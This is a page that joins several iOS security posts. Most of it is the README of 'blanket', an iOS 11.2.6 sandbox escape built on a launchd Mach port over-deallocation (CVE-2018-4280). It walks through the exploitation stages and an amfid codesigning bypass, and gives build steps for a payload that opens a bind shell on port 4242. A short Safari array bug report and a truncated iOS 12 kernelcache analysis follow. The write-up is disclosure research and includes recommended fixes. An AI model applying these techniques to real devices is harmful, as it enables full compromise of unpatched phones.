Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allowentitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a «malicious» exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied bytask_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORTspecial port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the «task» field. An equivalent API, thread_set_special_port, can be used to set a custom port in the «thread» field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a «malicious» exception message containing a Mach service port in place of the task and thread port. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the «malicious» exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASHexceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abortfunction.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASHexception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port:

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASHEXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identitymessage that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the «task» port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the «task» port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or subsequent stages fail, so it’s worth putting later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of «vulnerabilities» would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running so that it looks up our fake CARenderServer port in launchd. I decided to use a bug in libxpc that was already scheduled to be fixed for this purpose.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look atconvert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS.

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESSexception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name.

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damages itself.

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawnto launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.

Реклама

Serious bug, Array state will be cached in iOS 12 Safari.

Some problem of Array’s value state in the newly released iOS 12 Safari, for example, code like this:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>iOS 12 Safari bugs</title>
    <script type="text/javascript">
    window.addEventListener("load", function ()
    {
        let arr = [1, 2, 3, 4, 5];
        alert(arr.join());

        document.querySelector("button").addEventListener("click", function ()
        {
            arr.reverse();
        });
    });
    </script>
</head>
<body>
    <button>Array.reverse()</button>
    <p style="color:red;">test: click button and refresh page, code:</p>
</body>
</html>

It’s definitely a BUG! And it’s a very serious bug.

As my test, the bug is due to the optimization of array initializer which all values are primitive literal. For example () => [1, null, 'x'] will return such arrays, and all return arrays link to same memory address, and some method like toString() is also memorized. Normally, any mutable operation on such array will copy to a individual memory space and link to it, this is so-called copy-on-write technique (https://en.wikipedia.org/wiki/Copy-on-write).

reverse() method will mutate the array, so it should trigger CoW, Unfortunately, it doesn’t now, which cause bug.

On the other hand, all methods which do not modify the array should not trigger CoW, and I find that even a.fill(value, 0, 0) or a.copyWithin(index, 0, 0) won’t trigger CoW because such callings don’t really mutate the array. But I notice that a.slice() WILL trigger CoW. So I guess the real reason of this bug may be someone accidentally swap the index of slice and reverse.

Add a demo page, try it use iOS 12 Safari: https://cdn.miss.cat/demo/ios12-safari-bug.html

thanks

Analyzing the iOS 12 kernelcache’s tagged pointers

 

Not long after the iOS 12 developer beta was released, I started analyzing the new kernelcaches in IDA to look for interesting changes. I immediately noticed that ida_kernelcache, my kernelcache analysis toolkit, was failing on the iPhone 6 Plus kernelcache: it appeared that certain segments, notably the prelink segments like __PRELINK_TEXT, were empty. Even stranger, when I started digging around the kernelcache, I noticed that the pointers looked bizarre, starting with 0x0017 instead of the traditional 0xffff.

It appears that Apple may be making significant changes to the iOS kernelcache on some devices, including abandoning the familiar split-kext design in favor of a monolithic Mach-O and introducing some form of static pointer tagging, most likely as a space-saving optimization. In this post I’ll describe some of the changes I’ve found and share my analysis of the tagged pointers.

The new kernelcache format

The iOS 12 beta kernelcache comes in a new format for some devices. In particular, if you look at build 16A5308e on the iPhone 6 Plus (iPhone7,1), you’ll notice a few differences from iOS 11 kernelcaches:

  • The __TEXT__DATA_CONST__TEXT_EXEC__DATA, and __LINKEDIT segments are much bigger due to the integration of the corresponding segments from the kexts.
  • There are several new sections:
    • __TEXT.__fips_hmacs
    • __TEXT.__info_plist
    • __TEXT.__thread_starts
    • __TEXT_EXEC.initcode
    • __DATA.__kmod_init, which is the combination of the kexts’ __mod_init_func sections.
    • __DATA.__kmod_term, which is the combination of the kexts’ __mod_term_func sections.
    • __DATA.__firmware
    • __BOOTDATA.__data
    • __PRELINK_INFO.__kmod_info
    • __PRELINK_INFO.__kmod_start
  • The segments __PRELINK_TEXT and __PLK_TEXT_EXEC__PRELINK_DATA, and __PLK_DATA_CONST are now 0 bytes long.
  • The prelink info dictionary in the section __PRELINK_INFO.__info no longer has the _PrelinkLinkKASLROffsetsand _PrelinkKCID keys; only the _PrelinkInfoDictionary key remains.
  • There is no symbol information.

This new kernelcache is laid out like follows:

__TEXT.HEADER                 fffffff007004000 - fffffff007008c60  [  19K ]
__TEXT.__const                fffffff007008c60 - fffffff007216c18  [ 2.1M ]
__TEXT.__cstring              fffffff007216c18 - fffffff007448d11  [ 2.2M ]
